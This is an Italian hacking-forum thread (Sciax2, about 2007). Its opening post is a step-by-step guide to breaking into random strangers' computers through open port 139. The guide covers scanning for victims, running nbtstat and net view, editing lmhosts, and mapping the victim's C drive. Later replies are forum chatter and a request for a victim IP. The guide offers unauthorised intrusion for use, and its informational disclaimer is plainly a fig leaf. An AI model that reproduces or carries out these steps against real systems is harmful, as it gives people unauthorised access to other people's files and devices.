• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

HackerStyler

Utente Medio
Autore del topic
1 Aprile 2007
191
0
Miglior risposta
0
[DiScLaImEr]
Tutto il materiale qui postato è a scopo informativo.Io e lo staff di questo forum non ci assumeremo nessuna responsabilità  dell'uso che gli utenti possono farne.
-------------------------------------------
Per chi vuole questa guida gia pronta in un BlocNotes xche nn ha tempo di leggerlo qui scaricatelo d questo link:
Perfavore, Entra oppure Registrati per vedere i Link!
[139].rar
-------------------------------------------
Come entrare da remoto su un computer che ha questa porta aperta?Tranquilli adesso ve lo dico...Cerchero di dirlo in modo chiaro.
Allora per prima cosa dovete avere l'Ip della vittima (con la porta 139 aperta).Se avete già  l'Ip della vittima siete apposto...
Se invece volete entrare in un pc a caso(con la 139 aperta) allora potrete usare diversi programmi reperibili in rete...
io vi consiglio xSharez(scanerrizza vari ip e quelli con la 139 aperta li inserisce in una lista!).
Risolto il 1° problema possiamo procedere:
-Andate su esegui e scrivete cmd(aprirete il DOS)
-Digitate:
cd c:\windows
Nbtstat -A "IP" (l'ip della persona con la 139 aperta)
A questo punto vi comparirà  una specie di tabella con nome,tipo e stato......
Prendiamo il nome e l'ip della nostra vittima e scriviamo nel DOS:
Edit c:\windows\lmhosts
"IP""NOME VITTIMA"#PRE(ci va prima l'IP della nostra vittima scelta nella tabella precedente e poi il nome).
Adesso andate su salva e poi su esci-------->vi ritroverete sul DOS e a wquesto punto digitate:
Nbtstat -R
Net View \\"NOME VITTIMA"
Se nn avete sbagliato niente vi uscirà  la lista delle periferiche condivise(HD,Stampanti)ecc.
Ora basta andare in RISORSE DI RETE e cliccare su STRUMENTI,CONNETTI A UNITA' RETE e inseruite come nome dell'unità  rete:
\\"NOME VITTIMA"\C
L'unità  C ora è condisa e avete il suo HD in mano...

Bye,
HackerStyler


------------------------------------------
HackerStyler'S Hotel[Link tolto]
Novità :Presto il sito dei grandi amici HackerStyler e HackerHabbo inisieme...Un Team Perfetto...
------------------------------------------
 
Cazz scusate ho visto ora che avevate affrontato gia questa discussione...uff mo me tokka kancellae tutto,che pall

------------------------------------------
HackerStyler'S Hotel[Link tolto]
Novità :Presto il sito dei grandi amici HackerStyler e HackerHabbo inisieme...Un Team Perfetto...
------------------------------------------
 
lascialo ormai xD

bn_1e9d506cd5.png
Perfavore, Entra oppure Registrati per vedere i Link!
 
So sicuro che valerio lo chiuderebbe...
Rgazzi il file ke ho messo nn è mio quella mio nn me lo uppa il mio kavolo di sito... ormai nn ha piu memoria è pieno di programmi uppati ormai dovro kambia hosting per le nuove cose da uppare ;)

------------------------------------------
HackerStyler'S Hotel[Link tolto]
Novità :Presto il sito dei grandi amici HackerStyler e HackerHabbo inisieme...Un Team Perfetto...
------------------------------------------
 
xD... nn t preoccupà  sty..tanto anke se lo kude mica lo cancella...


io nn indovino sempre io nn predico sempre io nn prevedo sempre<h1>io deduco e so sempre</h1></u>
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif

anim4.gif
gogeta3.gif
gokussj3ryuken.gif
emoticonmsnsourireaffreon1.gif

nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif
nextimg.gif

userbar-sciax2forum.PNG
 
Mi DAreste un Ip con 139 aperta??? io nn ne riesco a trovare 1!!!! Volevo chiedere come uscivano tutti gli hardware, e poi se cn hamachi tutti hanno la porta 139 aperta, perchè io ho provato con uno che mi usciva un nome lunghissimo, e alla fine quand andavo a fare unisciti a risorsa di rete nn mi andava. Please!
 
Ti ho risp io... Non si trova la pappa pronta... O provi dal locale o te fai in culo... Scusa il linguaggio ma ste cose non le sopporto!

NHT [New Hacker Team] By Vincy & HackerStyler
userbarsciax2gz4.gif